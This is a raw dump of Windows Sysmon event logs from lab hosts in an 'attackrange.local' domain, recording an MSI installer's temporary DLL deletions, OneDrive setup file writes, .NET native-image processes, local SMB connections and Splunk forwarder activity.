AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSIAA62.tmpMD5=915C007381385DDEB22A0FF66AA47FAE,SHA256=F12A80A4B3EB7789B005328C25316B1C7995EFA8CD14F00EA55EE7412A3BBF09,IMPHASH=C2AAC1B2B9FA36FBEA7CD3D2B4516228truetrue 10341000x800000000000000079357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.529{A7A01FEF-B626-607E-1600-00000000BB01}15403000C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2E00-00000000BB01}2196C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.529{A7A01FEF-B626-607E-1600-00000000BB01}15403000C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2E00-00000000BB01}2196C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000079355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.513{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\wix.dllMD5=45688182A675C3B0563C9201D8F01B39,SHA256=4B3CF980A840F3E36D98FEF3B4D4C302313AC7E2EA3310F5D0D71722853975C7,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 11241100x800000000000000079354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:22.513{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\UpdateRingSettings.dll2021-04-20 14:58:22.513 23542300x800000000000000079353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.498{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\Telemetry.dllMD5=0B0D7B8DDED32A95DFC994B3C6CC0126,SHA256=6292E23132D15FBDF18B45FB9DAF837245CC08B6EF19E920BE56E2D04E754DC9,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.498{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\System.Spatial.resources.dllMD5=AD73B408CD61BC349ECB29D018A90F25,SHA256=60225714F5F67C7AFE03ADAD6B06DE02396F687F441813847C7C5D083AB10FBD,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.498{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\System.Spatial.dllMD5=539ECBA6ADC02BD1711E0C0883A502AF,SHA256=0B347698A279A88CF278759100A488941AAF7ACCA96C52194845290D08A26366,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.498{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\Squirrel.dllMD5=787F70131787B84A5BACCC51B5FDEB10,SHA256=D36F4F1DC51A3C93C4A578BAE0FAEE4DECD06B7B29F813197E06B5CDC105A7C3,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.498{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\Splat.dllMD5=1975E684C48457D72F37696BB1B880E6,SHA256=7A6F255CF59D6594C8F5BC466956F09305A3A10C8D683E485C7E1F14371701C4,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.498{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\SetupConfigCustomAction.dllMD5=87015D400C9199B4A701EB81A664B551,SHA256=4346DC073DBB96595CC1CAD1F4EB2FCC729E8284F4968A73C25B8296A81187E4,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.482{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\NuGet.Squirrel.dllMD5=6A5C1FA6116A760D4CE0B31B65A71E4C,SHA256=BCD5B82372B117F16956B5704A56FC37D3DA91A9D8A8BBB53D026B99B88F0817,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.482{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\Mono.Cecil.dllMD5=7546ACEBC5A5213DEE2A5ED18D7EBC6C,SHA256=7744C9C84C28033BC3606F4DFCE2ADCD6F632E2BE7827893C3E2257100F1CF9E,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.482{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\Microsoft.Web.XmlTransform.dllMD5=6AD7D1E92C9833F4BDDE6A4BC84F2E1A,SHA256=13DCF5066E00152238191314D4A46605204FFABDBB830BDD0C97DF3027D1261D,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.482{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\Microsoft.Deployment.WindowsInstaller.dllMD5=233CA870E2530DA48897DB8FA6F1E3CF,SHA256=CA420FEF4909C10E2E95C8C899FA7D009892DDDF0B2424870236F1D0676E9165,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.482{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\Microsoft.Deployment.Resources.dllMD5=343DC7A39956EC67A576C91D3765A1CD,SHA256=71D85BB2863F61CA11625E8BEE171114047D3F3E95792309E2040F3E139BAAE3,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 354300x800000000000000079342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.990{A7A01FEF-B622-607E-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57558-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local445microsoft-ds 354300x800000000000000079341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.990{A7A01FEF-B622-607E-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57558-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local445microsoft-ds 23542300x800000000000000079340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.466{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\Microsoft.Data.Services.Client.resources.dllMD5=7F92069CFD4EA63487C25D6ECD96D1F3,SHA256=36DD5A40328C39E032F2CDB3B0F8CCF384716E46488A4E3356A387F74C03357B,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.466{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\Microsoft.Data.Services.Client.dllMD5=269BDEFAC8F933B2B133660BCEB81F13,SHA256=3CE056DD03533E4A8D9644B99ADE69B8CF6D5EDF3AB26FE2B9467AEC17A3C85D,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.435{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\Microsoft.Data.OData.resources.dllMD5=055CACF6D88D81AD52A8E30E83235CD2,SHA256=8435109572A7548A21C20CC0A3054060127F49376EFAF548AAA303828F257217,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.419{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\Microsoft.Data.OData.dllMD5=2D8AEF0300B61BB6A075950900AEFFE3,SHA256=B37D4E017BB6444E00F7A840BD3562D194D199288A0B8406B6DCB431A867B702,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.404{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\Microsoft.Data.Edm.resources.dllMD5=72CB6CEFD5CE2E63EF929EC63B5C84AF,SHA256=AFCC051B49B4A102BD618D8F3E914346D402588E42333F71C2AB43C9F90F5590,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.388{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\Microsoft.Data.Edm.dllMD5=78131030AB1F627955BE3182345BD001,SHA256=E5B0363A26DB4A5C0EDBB8D0EFF0A7B7C071C6C31960832A4332D31FCD170170,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.373{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\Microsoft.Bond.Interfaces.dllMD5=52A51EE95888A7BA3A277C02AC07734B,SHA256=AF910124D7E52D5350D4AB125FA661032936C53D7ADAD081D32766F25297A17E,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.373{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\Microsoft.Bond.dllMD5=E71099478421938F865EE4AD49B5D4E8,SHA256=41A5C53E2AFAD3E9934582B97229216D614A0AFE520C4ADB765B01E7801BE727,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.357{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\Microsoft.Applications.Telemetry.dllMD5=13A81056CEAEDAA4C8A4FBB59AA5D92C,SHA256=5E733EF38D2B71111A91B6BC468F415B59BF2B33157D4F728B8926014405E330,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.357{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\Microsoft.Applications.Telemetry.Desktop.dllMD5=D5FD6ADB0C22D8D947A9E282EDD89D6D,SHA256=100CF34635E4BCD9C3793E9231736E6FF62715FCEAB32BAFBFF49B48B85AC64A,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.357{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\ICSharpCode.SharpZipLib.dllMD5=F2BF7155CDB0F7E7ED3AF446BA588D8E,SHA256=B6BC2CCDD4E72C087B5D9D19E29F5069310EEF5ADE4B42D367960997433F0C05,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.341{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\DeltaCompressionDotNet.MsDelta.dllMD5=F6437EBA2912907A6F13CC18E17239F0,SHA256=7C64414EF3A6E73D3CE5761DC964EB27DA68F70F8B0C04AD62DEE0AA9EAF1BEB,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.341{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\DeltaCompressionDotNet.dllMD5=3CE9C038499D47BFDFABC197F34E04F8,SHA256=2F2FAEBE394F94EAF7F0FBDC09E43F8370717F5C684B66AB61A7DABB755EF4BF,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.326{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\CustomAction.configMD5=4BFDEF8658100D564788F676B4A63864,SHA256=A2E973CCE1F85A2AB9D6E7A90909B17B332C1EF4159FFC57BB3CF688E02BA9EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.326{A7A01FEF-EC0C-607E-370E-00000000BB01}2036NT AUTHORITY\SYSTEMC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIAA62.tmp-\BootstrapperCore.dllMD5=B0D10A2A622A322788780E7A3CBB85F3,SHA256=F2C2B3CE2DF70A3206F3111391FFC7B791B32505FA97AEF22C0C2DBF6F3B0426,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 10341000x800000000000000079325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.201{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC0E-607E-380E-00000000BB01}5848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.138{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC0E-607E-380E-00000000BB01}5848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.138{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC0E-607E-380E-00000000BB01}5848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000079322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:22.123{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ucrtbase.dll2021-04-20 14:58:22.123 23542300x800000000000000079321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:21.998{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE266F0742E61E3AD73A822BA295147B,SHA256=529515DA95F231327671753EB174354222128D2D82A56B4535D46786CC9F8E56,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000079320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:21.982{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Templates.2\qtquicktemplates2plugin.dll2021-04-20 14:58:21.888 23542300x800000000000000050523Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:22.931{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AAE4001243C18236079DFCEADCBF82AE,SHA256=76825901430AFDD52641EFD307EBEF0BD223879B11890EE0087A70D0913820CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050522Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:22.743{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C2AEE7458F0E899F62EEE9B218942D9,SHA256=05E7BC01E1FC32CC7526254AA067CA0895B6FE490CC35BD030EDF12C225F312C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.935{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2FC1AA88CB8476C6C373552785324A84,SHA256=720C3F70F80569F7581EBDCAD37D306EA24A274DA2BF51BC19FFF6BC853E6E4E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.935{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC0F-607E-3B0E-00000000BB01}4460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.935{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC0F-607E-3B0E-00000000BB01}4460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000079427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.935{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\wix.dllMD5=45688182A675C3B0563C9201D8F01B39,SHA256=4B3CF980A840F3E36D98FEF3B4D4C302313AC7E2EA3310F5D0D71722853975C7,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.904{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\Telemetry.dllMD5=0B0D7B8DDED32A95DFC994B3C6CC0126,SHA256=6292E23132D15FBDF18B45FB9DAF837245CC08B6EF19E920BE56E2D04E754DC9,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 